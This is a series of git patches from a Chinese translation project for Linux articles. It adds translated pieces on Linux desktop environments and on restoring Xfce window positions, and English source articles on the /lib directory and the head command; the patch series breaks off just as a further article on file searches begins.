-[10]: https://www.linux.com/sites/lcom/files/styles/rendered_file/public/linux-options.png?itok=lkqD1UMj
From b935033a84be6c75ff0cf9361399ed23ad0fa155 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 6 Jan 2018 12:19:46 +0800
Subject: [PATCH 060/371] translated
Migrating to Linux: Graphical Environments
---
...rating to Linux- Graphical Environments.md | 109 ++++++++++++++++++
1 file changed, 109 insertions(+)
create mode 100644 translated/tech/20171219 Migrating to Linux- Graphical Environments.md
diff --git a/translated/tech/20171219 Migrating to Linux- Graphical Environments.md b/translated/tech/20171219 Migrating to Linux- Graphical Environments.md
new file mode 100644
index 0000000000..c4450237a8
--- /dev/null
+++ b/translated/tech/20171219 Migrating to Linux- Graphical Environments.md
@@ -0,0 +1,109 @@
+迁移到 Linux 系统:图形操作环境
+======
+
+这是我们迁移到 Linux 系统系列的第三篇文章。如果你错过了先前的两篇,这里是它们的链接:[Linux 新手指导][1] 和 [Linux 文件及文件系统][2]。本文中,我们将讨论图形操作环境。Linux 的优势之一就是选择很多:你可以选择一个图形界面,并把它定制成你想要的样子。
+
+一些主流的 Linux 图形界面包括:Cinnamon、Gnome、KDE Plasma、Xfce 和 MATE,总之这里有很多选择。
+
+有一点经常让 Linux 新手感到困惑:虽然特定的 Linux 发行版有一个默认的图形环境,但是一般你可以随时更换图形界面。这和 Windows 或 Mac OS 用户的习惯不同。发行版和图形环境是两回事,很多时候二者并没有紧密耦合在一起。此外,为一个图形环境构建的应用程序通常也可以运行在其他图形环境中。比如说,一个为 KDE Plasma 图形界面编写的应用程序,通常也能在 Gnome 桌面图形环境中正常运行。
+
+由于人们熟悉 Windows 和 MacOS 系统,部分 Linux 图形环境在一定程度上尝试模仿它们,但也有一些 Linux 图形界面是独具一格的。
+
+下面,我将就一些不同的 Linux 发行版,展示几个 Linux 图形环境。如果你不确定应该采用哪个 Linux 发行版,我建议从 [Ubuntu][3] 开始,使用其长期支持(LTS)版本(撰写本文时为 16.04.3)。Ubuntu 非常稳定,而且容易使用。
+
+### 由 Mac 过渡
+
+Elementary OS 发行版提供了和 Mac 系统风格很接近的界面。它的默认图形环境被称作 Pantheon,很适合 Mac 用户过渡使用。它的屏幕底部有一个停靠栏,整体设计力求极其简单易用。为了保持简约的风格,很多默认的应用程序甚至都没有菜单。相反,按钮和控件被放在应用程序的标题栏上(图 1)。
+
+
+![Elementary OS][5]
+
+图 1: Elementary OS Pantheon.
+
+Ubuntu 发行版提供的默认图形界面也很像 Mac。Ubuntu 17.04 或更老的版本使用名为 Unity 的图形环境,它默认把停靠栏放在屏幕左侧,屏幕顶部有一个所有应用程序共享的全局菜单栏。注意,较新版本的 Ubuntu 正在转向 Gnome 环境。
+
+### 由 Windows 过渡
+
+ChaletOS 模仿 Windows 来设计自己的界面,以帮助用户更轻松地从 Windows 迁移过来。ChaletOS 使用的图形环境是 Xfce(图 2)。屏幕左下角的惯常位置有一个主页/开始菜单,带有搜索栏;桌面上有图标,屏幕右下角有通知区域。它看起来和 Windows 非常像,乍一看,别人甚至可能会以为你跑的就是 Windows。
+
+Zorin OS 发行版同样尝试模仿 Windows。Zorin OS 使用经过修改的 Gnome 桌面,使其工作方式与 Windows 的图形界面相似:开始按钮位于左下角,通知和指示器面板位于右下角。点击开始按钮会弹出一个类似 Windows 的应用程序列表和一个搜索栏。
+
+### 独特的图形环境
+
+Gnome 桌面(图 3)是最常用的图形环境之一。许多发行版将 Gnome 作为默认的图形环境。Gnome 并不打算模仿 Windows 或是 MacOS,而是以其自身的优雅和易用为目标。
+
+Cinnamon 环境的诞生,很大程度上源于人们对 Gnome 桌面环境从版本 2 到版本 3 剧烈变化的不满。尽管 Cinnamon 看起来并不像旧的 Gnome 版本 2,但它依旧尝试提供一个简洁的界面,其工作方式和 Windows XP 有几分相似。
+
+MATE 图形环境直接以 Gnome 版本 2 为蓝本:屏幕顶部有一个用于应用程序和设置的菜单栏,屏幕底部有一个面板,用于放置正在运行的应用程序选项卡和其他小部件。
+
+KDE Plasma 环境围绕小部件界面构建,小部件既可以安装在桌面上,也可以安装在面板中(图 4)。
+
+![KDE Plasma][8]
+
+图 4: 安装了 KDE Plasma 的 Kubuntu 操作系统。
+
+[使用许可][6]
+
+没有哪个图形环境比其他的更好,它们只是风格不同,以适应不同人的喜好。再说一次,如果这些选择让你无从下手,那就从 [Ubuntu][3] 开始吧。
+
+### 相似与不同
+
+不同的操作系统做事的方式不同,这会给迁移带来挑战。比如说,菜单可能出现在不同的位置,访问设置选项的路径也可能不同。下面我列举 Linux 中一些相似和不同的地方,帮助你更快适应。
+
+### 鼠标
+
+Linux 中鼠标的工作方式通常和 Windows 与 MacOS 有所差异。在 Windows 和 Mac 中,大多数东西都是双击打开;而在 Linux 中,很多图形界面被设置为单击打开。
+
+此外,在 Windows 中,你通常需要单击一个窗口才能让它获得焦点;而在 Linux 中,很多界面被设置为鼠标所在的窗口就是焦点窗口,即便它不在最顶层。这种差异很微妙,有时行为会让人吃惊。比如说,在 Windows 中,假如有一个后台应用(不是顶层窗口),你把鼠标移到它上面,不点击,只滚动鼠标滚轮,滚动的是顶层的应用程序窗口;而在 Linux 中,滚动的则是那个后台窗口(鼠标所悬停的窗口)。
+
+### 菜单
+
+应用菜单是电脑程序的基本部件,但最近似乎有一种趋势,把菜单挪到不碍事的地方,甚至完全去掉。因此,当你迁移到 Linux 时,可能会在预期的位置找不到菜单。应用程序菜单可能像 MacOS 一样出现在全局共享的菜单栏里;也可能像很多移动应用那样,藏在一个"更多选项"图标之后;或者菜单被完全移除,换成了按钮,正如 Elementary OS 的 Pantheon 环境里的一些程序那样。
+
+### 工作空间
+
+很多 Linux 图形环境提供了多个工作空间。一个工作空间占满整个屏幕,包含若干正在运行的应用程序窗口;切换到不同的工作空间会改变哪些应用程序可见。这个概念是把用于一个项目的应用程序分组放在一个工作空间,把另一个项目用到的应用程序放在不同的工作空间。
+
+不是每个人都需要甚至喜欢工作空间,但我还是要提一下,因为作为新手,你可能会无意间按下某个组合键切换了工作空间,然后惊呼:"喂!我的应用程序哪去了?"如果你在本该看到应用程序的地方只看到了桌面壁纸,那多半是你切换了工作空间,你的程序仍在另一个当前不可见的工作空间里运行。在很多 Linux 环境中,按下 Alt-Ctrl 加一个方向键(上、下、左或右)就可以切换工作空间。但愿你能在另一个工作空间里看到你的程序还好好地运行着。
+
+当然,如果你刚好喜欢工作空间(很多人都喜欢),那么你就发现了 Linux 一个很有用的默认功能。
+
+### 设置
+
+许多 Linux 图形环境也提供某种设置程序或设置面板,让你对系统进行配置。注意,和 Windows 与 MacOS 类似,Linux 的很多细节都可以配置,但并非所有的详细设置都能在设置程序里找到。不过,这些设置项已经足以满足典型桌面系统的大部分需求,比如选择桌面壁纸、调整多久后息屏、连接打印机等等。
+
+设置程序中各项设置的分组方式和命名方式,通常和 Windows 或 MacOS 上不一样。即使同是 Linux,不同的图形界面呈现设置的方式也可能不同,这需要时间去适应。当然,想知道如何在你的图形环境中配置某项设置,在线搜索是个好办法。
+
+### 应用程序
+
+最后,Linux 上的应用程序也可能有所不同。你会发现一些熟悉的应用程序,也有一些可能是你完全没接触过的。比如说,你能在 Linux 上找到 Firefox、Chrome 和 Skype。如果找不到某个特定的应用程序,通常会有可用的替代程序;如果还是没有,你可以用 WINE 这样的兼容层来运行很多 Windows 应用程序。
+
+在很多 Linux 图形环境中,你可以按下键盘上的 Windows 徽标键来打开应用程序菜单;在另一些环境中,你需要点击开始/主页按钮,或者点击应用程序菜单。在很多图形环境中,你可以按类别搜索应用程序,而不必知道它的具体名字。比如说,你想用一个编辑器程序但不知道它叫什么,这时可以打开应用程序菜单,在搜索框中输入 "editor",它就会为你显示一个或多个被归为编辑器类的应用程序。
+
+为了帮你起步,这里列出了一些常见应用程序以及它们在 Linux 上可能的替代品。
+
+[linux][10]
+
+请注意,这个列表远非完整,Linux 提供了大量可以满足你需求的选择。
+
+想了解更多 Linux 知识,可以学习 Linux 基金会和 edX 提供的免费在线课程 ["Linux 入门"][9]。
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/learn/2017/12/migrating-linux-graphical-environments
+
+作者:[John Bonesio][a]
+译者:[译者ID](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/johnbonesio
+[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
+[2]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
+[3]:https://www.evernote.com/OutboundRedirect.action?dest=https%3A%2F%2Fwww.ubuntu.com%2Fdownload%2Fdesktop
+[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.png?itok=kJk2-BsL (Elementary OS)
+[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/kubuntu.png?itok=a2E7ttaa (KDE Plasma)
+[9]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
+
+[10]: https://www.linux.com/sites/lcom/files/styles/rendered_file/public/linux-options.png?itok=lkqD1UMj
From a7895d88b78ce60a5d3df7f00d9690f084992b53 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 6 Jan 2018 12:20:29 +0800
Subject: [PATCH 061/371] PRF&PUB:20171216 Saving window position in Xfce
session.md
@lujun9972 https://linux.cn/article-9207-1.html
---
... Saving window position in Xfce session.md | 68 +++++++++++++++++++
... Saving window position in Xfce session.md | 68 -------------------
2 files changed, 68 insertions(+), 68 deletions(-)
create mode 100644 published/20171216 Saving window position in Xfce session.md
delete mode 100644 translated/tech/20171216 Saving window position in Xfce session.md
diff --git a/published/20171216 Saving window position in Xfce session.md b/published/20171216 Saving window position in Xfce session.md
new file mode 100644
index 0000000000..b744f803bd
--- /dev/null
+++ b/published/20171216 Saving window position in Xfce session.md
@@ -0,0 +1,68 @@
+在 Xfce 会话中保存窗口的位置
+======
+
+摘要:如果你发现 Xfce 会话不能保存窗口的位置,那么启用“登出时保存”,然后登出再重新登录一次,可能就能永久修复这个问题了(如果你想要保持相同的会话,再次登录时恢复的话)。 下面是详细内容。
+
+我用 Xfce 作桌面有些年头了,但是每次重启后进入之前保存的会话时总会有问题出现。 登录后, 之前会话中保存的应用都会启动, 但是所有的工作区和窗口位置数据都会丢失, 导致所有应用都堆在默认工作区中,乱糟糟的。
+
+多年来,很多人都报告过这个问题(Ubuntu、Xfce 以及 Red Hat 的 bug 追踪系统中都有登记)。 虽然 Xfce4.10 中已经修复过了一个相关 bug, 但是我用的 Xfce4.12 依然有这个问题。 如果不是我的其中一个系统能够正常的恢复各个窗口的位置,我几乎都要放弃找出问题的原因了(事实上我之前已经放弃过很多次了)。
+
+今天,我深入对比了两个系统的不同点,最终解决了这个问题。 我现在就把结果写出来, 以防有人也遇到相同的问题。
+
+提前的一些说明:
+
+1. 由于这个笔记本只有我在用,因此我几乎不登出我的 Xfce 会话。 我一般只是休眠然后唤醒,除非由于要对内核打补丁才进行重启, 或者由于某些改动损毁了休眠镜像导致系统从休眠中唤醒时卡住了而不得不重启。 另外,我也很少使用 Xfce 工具栏上的重启按钮重启;一般我只是运行一下 `reboot`。
+2. 我会使用 xterm 和 Emacs, 这些不太复杂的 X 应用无法记住他们自己的窗口位置。
+
+Xfce 将会话信息保存到主用户目录中的 `.cache/sessions` 目录中。在经过仔细检查后发现,在正常的系统中有两类文件存储在该目录中,而在非正常的系统中,只有一类文件存在该目录下。
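+
+下面是一个简单的示意,展示如何查看该目录下的会话文件(文件名因系统而异,以下仅为示例):
+
+```
+$ ls ~/.cache/sessions/
+xfce4-session-myhost:0
+xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state
+```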
+
+其中一类文件的名字类似 `xfce4-session-hostname:0` 这样的,其中包含的内容类似下面这样的:
+
+```
+Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b
+Client9_Hostname=local/hostname
+Client9_CloneCommand=xterm
+Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b
+Client9_Program=xterm
+Client9_UserId=user
+```
+
+这个文件记录了所有正在运行的程序。如果你进入“设置 -> 会话和启动”并清除会话缓存, 就会删掉这种文件。 当你保存当前会话时, 又会创建这种文件。 这就是 Xfce 知道要启动哪些应用的原因。 但是请注意,上面并没有包含任何窗口位置的信息。 (我还曾经以为可以根据会话 ID 来找到其他地方的一些相关信息,但是并没有)。
+
+正常工作的系统在目录中还有另一类文件,名字类似 `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state` 这样的。 其中文件内容类似下面这样:
+
+```
+[CLIENT] 0x200000f
+[CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733
+[CLIENT_LEADER] 0x200000f
+[RES_NAME] xterm
+[RES_CLASS] XTerm
+[WM_NAME] xterm
+[WM_COMMAND] (1) "xterm"
+[GEOMETRY] (860,35,817,1042)
+[GEOMETRY-MAXIMIZED] (860,35,817,1042)
+[SCREEN] 0
+[DESK] 2
+[FLAGS] 0x0
+```
+
+注意这里的 `GEOMETRY` 和 `DESK` 记录的正是我们想要的窗口位置以及工作区号。因此不能保存窗口位置的原因就是因为缺少这个文件。
+
+继续深入下去,我发现当你明确地手工保存会话时,之后保存第一个文件而不会保存第二个文件。 但是当登出保存会话时则会保存第二个文件。 因此, 我进入“设置 -> 会话和启动”中,在“通用”标签页中启用登出时自动保存会话, 然后登出后再进来, 然后, 第二个文件就出现了。 再然后我又关闭了登出时自动保存会话。(因为我一般在排好屏幕后就保存一个会话, 但是我不希望做出的改变也会影响到这个保存的会话, 如有必要我会明确地手工进行保存),现在我的窗口位置能够正常的恢复了。
+
+这也解释了为什么有的人会有问题而有的人没有问题: 有的人可能一直都是用登出按钮重启,而有些人则是手工重启(或者仅仅是由于系统崩溃了才重启)。
+
+顺带一提,这类问题, 以及为解决问题而付出的努力,正是我赞同为软件存储的状态文件编写 man 页或其他类似文档的原因。 为用户编写文档,不仅能帮助别人深入挖掘产生奇怪问题的原因, 也能让软件作者注意到软件中那些奇怪的东西, 比如将会话状态存储到两个独立的文件中去。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.eyrie.org/~eagle/journal/2017-12/001.html
+
+作者:[Russ Allbery][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.eyrie.org
diff --git a/translated/tech/20171216 Saving window position in Xfce session.md b/translated/tech/20171216 Saving window position in Xfce session.md
deleted file mode 100644
index e57a667ccb..0000000000
--- a/translated/tech/20171216 Saving window position in Xfce session.md
+++ /dev/null
@@ -1,68 +0,0 @@
-在 Xfce 会话中保存窗口的位置
-======
-摘要:如果你发现 Xfce session 不能保存窗口的位置,那么启用 `save on logout` 然后登出再进来一次,可能就能修复这个问题了 (permanently, if you like keeping the same session and turn saving back off again)。 下面是详细内容。
-
-我用 Xfce 作桌面有些年头了,但是每次重启后进入之前保存的 session 时总会有问题出现。 登陆后, 之前 session 中保存的应用都会启动, 但是所有的工作区和窗口位置数据会丢失, 导致所有应用都堆在默认工作区中,乱糟糟的。
-
-多年来,很多人都报道过这个问题( Ubuntu, Xfce, 以及 Red Hat 的 bug 追踪系统中都有登记这个 bug)。 虽然 Xfce4.10 中已经修复过了一个相关 bug, 但是我用的 Xfce4.12 依然有这个问题。 如果不是我的其中一个系统能够正常的回复各个窗口的位置,我几乎都要放弃找出问题的原因了(事实上我之前已经放弃过很多次了)。
-
-今天,我深入对比了两个系统的不同点,最终解决了这个问题。 我现在就把结果写出来, 以防有人也遇到相同的问题。
-
-提前的一些说明:
-
- 1。由于这个笔记本只有我在用,因此我几乎不登出我的 Xfce session。 我一般只是休眠然后唤醒,除非由于要对内核打补丁才进行重启, 或者由于某些改动损毁了休眠镜像导致系统从休眠中唤醒时卡住了而不得不重启。 另外,我也很少使用 Xfce 工具栏上的重启按钮重启; 一般我只是运行一下 `reboot`。
-
- 2。我会使用 xterm 和 Emacs, 这些 X 应用写的不是很好,无法记住他们自己的窗口位置。
-
-Xfce 将 sessions 信息保存到主用户目录中的 `.cache/sessions` 目录中。在经过仔细检查后发现,在正常的系统中有两类文件存储在该目录中,而在非正常的系统中,只有一类文件存在该目录下。
-
-其中一类文件的名字类似 `xfce4-session-hostname:0` 这样的,其中包含的内容类似下面这样的:
-```
-Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b
-Client9_Hostname=local/hostname
-Client9_CloneCommand=xterm
-Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b
-Client9_Program=xterm
-Client9_UserId=user
-
-```
-
-这个文件记录了所有正在运行的程序。如果你进入 Settings -> Session and Startup 并清除 session 缓存, 就会删掉这种文件。 当你保存当前 session 时, 又会创建这种文件。 这就是 Xfce 知道要启动哪些应用的原因。 但是请注意,上面并没有包含任何窗口位置的信息。 (我还曾经以为可以根据 session ID 来找到其他地方的一些相关信息,但是失败了)。
-
-正常工作的系统在目录中还有另一类文件,名字类似 `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state` 这样的。 其中文件内容类似下面这样:
-```
-[CLIENT] 0x200000f
- [CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733
- [CLIENT_LEADER] 0x200000f
- [RES_NAME] xterm
- [RES_CLASS] XTerm
- [WM_NAME] xterm
- [WM_COMMAND] (1) "xterm"
- [GEOMETRY] (860,35,817,1042)
- [GEOMETRY-MAXIMIZED] (860,35,817,1042)
- [SCREEN] 0
- [DESK] 2
- [FLAGS] 0x0
-
-```
-
-注意这里的 geometry 和 desk 记录的正是我们想要的窗口位置以及工作区号。因此不能保存窗口位置的原因就是因为缺少这个文件。
-
-继续深入下去,我发现当你明确地手工保存 sessino 时,智慧保存第一个文件而不会保存第二个文件。 但是当登出保存 session 时则会保存第二个文件。 因此, 我进入 Settings -> Session and Startup 中,在 Genral 标签页中启用登出时自动保存 session, 然后登出后再进来, 然后 tada, 第二个文件出现了。 再然后我又关闭了登出时自动保存 session。( 因为我一般在排好屏幕后就保存一个 session, 但是我不希望做出的改变也会影响到这个保存的 session, 如有必要我会明确地手工进行保存), 现在 我的窗口位置能够正常的回复了。
-
-这也解释了为什么有的人会有问题而有的人没有问题: 有的人可能一直都是用登出按钮重启,而有些人则是手工重启(或者仅仅是由于系统漰溃了才重启)。
-
-顺带一提,这类问题, 以及为解决问题而付出的努力正是我赞同为软件存储的状态文件编写 man 页或其他类似文档的原因。 为用户编写文档,不仅能帮助别人深入挖掘产生奇怪问题的原因, 也能让软件作者注意到软件中那些奇怪的东西, 比如将 session 状态存储到两个独立的文件中去。
-
-
---------------------------------------------------------------------------------
-
-via: https://www.eyrie.org/~eagle/journal/2017-12/001.html
-
-作者:[J. R. R. Tolkien][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.eyrie.org
From 2bdb2ab1fe8d53c5121e2dce9ed4fac26b612f7e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:21:29 +0800
Subject: [PATCH 062/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20directory?=
=?UTF-8?q?=20structure:=20/lib=20explained?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nux directory structure- -lib explained.md | 77 +++++++++++++++++++
1 file changed, 77 insertions(+)
create mode 100644 sources/tech/20170927 Linux directory structure- -lib explained.md
diff --git a/sources/tech/20170927 Linux directory structure- -lib explained.md b/sources/tech/20170927 Linux directory structure- -lib explained.md
new file mode 100644
index 0000000000..3f8322d630
--- /dev/null
+++ b/sources/tech/20170927 Linux directory structure- -lib explained.md
@@ -0,0 +1,77 @@
+Linux directory structure: /lib explained
+======
+[![lib folder linux][1]][1]
+
+We have already explained other important system folders such as /bin, /boot, /dev, and /etc in our previous posts. Please check the links below for more information about the other folders you are interested in. In this post, we will see what the /lib folder is all about.
+
+[**Linux Directory Structure explained: /bin folder**][2]
+
+[**Linux Directory Structure explained: /boot folder**][3]
+
+[**Linux Directory Structure explained: /dev folder**][4]
+
+[**Linux Directory Structure explained: /etc folder**][5]
+
+[**Linux Directory Structure explained: /lost+found folder**][6]
+
+[**Linux Directory Structure explained: /home folder**][7]
+
+### What is /lib folder in Linux?
+
+The /lib folder is a **library files directory** which contains the shared library files used by the system. In simple terms, these are supporting files that an application, command, or process uses for its proper execution. The dynamic library files required by the commands in /bin and /sbin are located in this directory, and the kernel modules are located here as well.
+
+Take the execution of the pwd command as an example. It requires some library files to execute properly. Let us see what happens when the pwd command is executed, using [the strace command][8] to figure out which library files are used.
+
+Example:
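+
+Below is a rough, trimmed sketch of the kind of strace invocation and output you might see; exact paths, library versions, and additional calls will vary by distribution and architecture:
+
+```
+$ strace -e trace=open,openat pwd
+openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
+openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
+/home/user
+```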
+
+If you observe the output, the open kernel call is used when running pwd; to execute properly, the command requires two library files.
+
+### Contents of /lib folder in Linux
+
+As said earlier, this folder contains object files and libraries, so it's good to know some of the important subfolders within this directory. The content below is from my system; you may see some variation on your system.
+
+**/lib/firmware** - This is a folder which contains hardware firmware code.
+
+### What is the difference between firmware and drivers?
+
+The software for many devices consists of two pieces that make the hardware work properly. The piece of code that is loaded into the actual hardware is the firmware, and the software that communicates between this firmware and the kernel is called the driver. This way the kernel can communicate directly with the hardware and make sure the hardware is doing the work assigned to it.
+
+**/lib/modprobe.d** - Configuration directory for modprobe command
+
+**/lib/modules** - All loadable kernel modules are stored in this directory. If you have more than one kernel installed, you will see a folder within this directory for each of them.
+
+**/lib/hdparm** - Contains SATA/IDE parameters for disks to run properly.
+
+**/lib/udev** - udev, the userspace /dev, is the device manager for the Linux kernel. This folder contains all udev-related files and folders, such as the rules.d folder, which contains udev-specific rules.
+
+### The /lib folder's sister folders: /lib32 and /lib64
+
+These folders contain architecture-specific library files. They are almost identical to the /lib folder except for architecture-level differences.
+
+### Other library folders in Linux
+
+**/usr/lib** - All software libraries are installed here. This does not contain system default or kernel libraries.
+
+**/usr/local/lib** - Extra system library files are placed here. These library files can be used by different applications.
+
+**/var/lib** - Holds dynamic data libraries/files like the rpm/dpkg database and game scores.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxnix.com/linux-directory-structure-lib-explained/
+
+作者:[Surendra Anne][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxnix.com/author/surendra/
+[1]:https://www.linuxnix.com/wp-content/uploads/2017/09/The-lib-folder-explained.png
+[2]:https://www.linuxnix.com/linux-directory-structure-explained-bin-folder/
+[3]:https://www.linuxnix.com/linux-directory-structure-explained-boot-folder/
+[4]:https://www.linuxnix.com/linux-directory-structure-explained-dev-folder/
+[5]:https://www.linuxnix.com/linux-directory-structure-explainedetc-folder/
+[6]:https://www.linuxnix.com/lostfound-directory-linuxunix/
+[7]:https://www.linuxnix.com/linux-directory-structure-home-root-folders/
+[8]:https://www.linuxnix.com/10-strace-command-examples-linuxunix/
From 0a4a7e653fedc77dc7f0fabff07af2319ec31ce6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:23:36 +0800
Subject: [PATCH 063/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Head=20Co?=
=?UTF-8?q?mmand=20Explained=20for=20Beginners=20(5=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Explained for Beginners (5 Examples).md | 103 ++++++++++++++++++
1 file changed, 103 insertions(+)
create mode 100644 sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md
diff --git a/sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md b/sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md
new file mode 100644
index 0000000000..74d4655bba
--- /dev/null
+++ b/sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md
@@ -0,0 +1,103 @@
+Linux Head Command Explained for Beginners (5 Examples)
+======
+
+Sometimes, while working on the command line in Linux, you might want to take a quick look at a few initial lines of a file. For example, if a log file is continuously being updated, the requirement could be to view, say, the first 10 lines of the log file every time. While viewing the file in an editor (like [vim][1]) is always an option, there exists a command line tool - dubbed **head** \- that lets you view the first few lines of a file very easily.
+
+In this article, we will discuss the basics of the head command using some easy-to-understand examples. Please note that all steps/instructions mentioned here have been tested on Ubuntu 16.04 LTS.
+
+### Linux head command
+
+As already mentioned in the beginning, the head command lets users view the first part of files. Here's its syntax:
+
+head [OPTION]... [FILE]...
+
+And following is how the command's man page describes it:
+```
+Print the first 10 lines of each FILE to standard output. With more than one FILE, precede each
+with a header giving the file name.
+```
+
+The following Q&A-type examples should give you a better idea of how the tool works:
+
+### Q1. How to print the first 10 lines of a file on terminal (stdout)?
+
+This is quite easy using head - in fact, it's the tool's default behavior.
+
+head [file-name]
+
+The following screenshot shows the command in action:
+
+[![How to print the first 10 lines of a file][2]][3]
+
+### Q2. How to tweak the number of lines head prints?
+
+While 10 is the default number of lines the head command prints, you can change this number as per your requirement. The **-n** command line option lets you do that.
+
+head -n [N] [File-name]
+
+For example, if you want to only print first 5 lines, you can convey this to the tool in the following way:
+
+head -n 5 file1
+
+[![How to tweak number of lines head prints][4]][5]
+
+### Q3. How to restrict the output to a certain number of bytes?
+
+In addition to the number of lines, you can also restrict the head command output to a specific number of bytes. This can be done using the **-c** command line option.
+
+head -c [N] [File-name]
+
+For example, if you want head to only display first 25 bytes, here's how you can execute it:
+
+head -c 25 file1
+
+[![restrict the output to a certain number of bytes][6]][7]
+
+So you can see that the tool displayed only the first 25 bytes in the output.
+
+Please note that [N] "may have a multiplier suffix: b 512, kB 1000, K 1024, MB 1000*1000, M 1024*1024, GB 1000*1000*1000, G 1024*1024*1024, and so on for T, P, E, Z, Y."
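+
+For instance, assuming the suffixes above, the following would print the first kilobyte (1024 bytes) of the same file:
+
+```
+head -c 1K file1
+```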
+
+### Q4. How to have head print filename in output?
+
+If for some reason, you want the head command to also print the file name in output, you can do that using the **-v** command line option.
+
+head -v [file-name]
+
+Here's an example:
+
+[![How to have head print filename in output][8]][9]
+
+So as you can see, the filename 'file1' was displayed in the output.
+
+### Q5. How to have NUL as line delimiter, instead of newline?
+
+By default, the head command output is delimited by newline. But there's also an option of using NUL as the delimiter. The option **-z** or **\--zero-terminated** lets you do this.
+
+head -z [file-name]
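+
+The NUL delimiter is mainly useful in pipelines with other NUL-aware tools, so that file names containing spaces or newlines pass through safely. A rough sketch (the glob pattern is just an example):
+
+```
+find . -name '*.txt' -print0 | head -z -n 3 | xargs -0 ls -l
+```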
+
+### Conclusion
+
+As most of you'd agree, head is a simple command to understand and use, meaning there's little learning curve associated with it. The features (in terms of command line options) it offers are also limited, and we've covered almost all of them. So give these options a try, and when you're done, take a look at the command's [man page][10] to know more.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-head-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/vim-basics
+[2]:https://www.howtoforge.com/images/linux_head_command/head-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_head_command/big/head-basic-usage.png
+[4]:https://www.howtoforge.com/images/linux_head_command/head-n-option.png
+[5]:https://www.howtoforge.com/images/linux_head_command/big/head-n-option.png
+[6]:https://www.howtoforge.com/images/linux_head_command/head-c-option.png
+[7]:https://www.howtoforge.com/images/linux_head_command/big/head-c-option.png
+[8]:https://www.howtoforge.com/images/linux_head_command/head-v-option.png
+[9]:https://www.howtoforge.com/images/linux_head_command/big/head-v-option.png
+[10]:https://linux.die.net/man/1/head
From 6f2167bc9ed7ae71baa3c157fc4b111d9fdbf029 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:26:36 +0800
Subject: [PATCH 064/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Mastering=20file?=
=?UTF-8?q?=20searches=20on=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...170921 Mastering file searches on Linux.md | 222 ++++++++++++++++++
1 file changed, 222 insertions(+)
create mode 100644 sources/tech/20170921 Mastering file searches on Linux.md
diff --git a/sources/tech/20170921 Mastering file searches on Linux.md b/sources/tech/20170921 Mastering file searches on Linux.md
new file mode 100644
index 0000000000..80fde0f7f0
--- /dev/null
+++ b/sources/tech/20170921 Mastering file searches on Linux.md
@@ -0,0 +1,222 @@
+Mastering file searches on Linux
+======
+
+![](https://images.idgesg.net/images/article/2017/09/telescope-100736548-large.jpg)
+
